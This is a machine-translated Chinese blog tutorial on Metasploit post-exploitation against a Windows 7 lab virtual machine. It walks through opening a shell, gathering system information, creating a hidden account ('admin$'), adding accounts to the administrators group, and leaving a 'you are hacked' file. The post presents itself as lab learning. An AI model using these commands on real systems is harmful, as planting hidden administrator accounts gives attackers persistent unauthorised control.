当前位置:网站首页>Network security engineer Demo: the original * * is to get your computer administrator rights! [maintain]
Network security engineer Demo: the original * * is to get your computer administrator rights! [maintain]
2020-11-06 01:35:00 【Kali and programming】
Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. It's a success Win7 One virtual machine
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 Yes, it's taken down Windows After the host enters *** Stage , The specific operation is shown in the figure below .
step 1: Run the exploit module , As shown in the figure below .
command :run
step 2: Get into Windows The host cmd window , As shown in the figure below .
step 3: Use the command to view the system information of the victim host , Know yourself and know your enemy, and have a more comprehensive grasp of the target victim host , More comprehensive control of the target host , Get more comprehensive information , As shown in the figure below .
command :systeminfo
step 4: The system information of the victim host is shown in the figure below .
3.2 User management operation on the victim host , As shown in the figure below .
step 1: Add hidden user information to the victim host , As shown in the figure below .
command :net user A new user name $ User password /add
Example :net user admin$ 12456 /add
step 2: Check out the new users you just added , As shown in the figure below .
command :net user( Because the new user is a hidden user , So the command line can't see the user )
step 3: Add new users that are not hidden , As shown in the figure below .
command :net user A new user name User password /add
Example :net user admin 12456 /add
step 4: Check out the new users you just added , As shown in the figure below .
command :net user
step 5: Use the graphical interface in the victim host to view the newly created user , You can see the new hidden user in this interface ( If you need to achieve the real sense of hidden users, you need to change the registry , Please keep an eye on the follow-up of this issue )
step 6: Delete user , As shown in the figure below .
command :net user user name /del
Example :net user admin /del
step 7: Add the new user to the administrators group , As shown in the figure below .
command :net localgroup administrators /add
step 8: View the users of the administrators group , As shown in the figure below .
command :net localgroup administrators
3.3 File operation on the victim host , As shown in the figure below .
step 1: New folder
command :md file name
Example :md abc
step 2: Delete folder
command :rd file name
Example :rd abc
step 3: New text file , As shown in the figure below .
command :echo Text file content > file name
Example :echo hi you are hacked > hk.txt
3.4 Check the host name of the victim host , As shown in the figure below .
command :hostname
Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills ! Please add a link description
版权声明
本文为[Kali and programming]所创,转载请带上原文链接,感谢
边栏推荐
- What is the side effect free method? How to name it? - Mario
- Python3 e-learning case 4: writing web proxy
- I've been rejected by the product manager. Why don't you know
- Analysis of partial source codes of qthread
- 快速排序为什么这么快?
- MeterSphere开发者手册
- How to customize sorting for pandas dataframe
- Jmeter——ForEach Controller&Loop Controller
- Classical dynamic programming: complete knapsack problem
- 2019年的一个小目标,成为csdn的博客专家,纪念一下
猜你喜欢
How to encapsulate distributed locks more elegantly
Brief introduction and advantages and disadvantages of deepwalk model
带你学习ES5中新增的方法
Just now, I popularized two unique skills of login to Xuemei
The difference between gbdt and XGB, and the mathematical derivation of gradient descent method and Newton method
Lane change detection
一篇文章教会你使用Python网络爬虫下载酷狗音乐
[C / C + + 1] clion configuration and running C language
A brief history of neural networks
Python基础数据类型——tuple浅析
随机推荐
keras model.compile Loss function and optimizer
Brief introduction and advantages and disadvantages of deepwalk model
6.3 handlerexceptionresolver exception handling (in-depth analysis of SSM and project practice)
It is really necessary to build a distributed ID generation service
有了这个神器,快速告别垃圾短信邮件
6.2 handleradapter adapter processor (in-depth analysis of SSM and project practice)
零基础打造一款属于自己的网页搜索引擎
Did you blog today?
教你轻松搞懂vue-codemirror的基本用法:主要实现代码编辑、验证提示、代码格式化
Simple summary of front end modularization
Python download module to accelerate the implementation of recording
How to demote domain controllers and later in Windows Server 2012
Individual annual work summary and 2019 work plan (Internet)
一篇文章教会你使用Python网络爬虫下载酷狗音乐
Vue.js Mobile end left slide delete component
一篇文章带你了解SVG 渐变知识
The dynamic thread pool in Kitty supports Nacos and Apollo multi configuration centers
Custom function form of pychar shortcut key
NLP model Bert: from introduction to mastery (2)
Interpretation of Cocos creator source code: engine start and main loop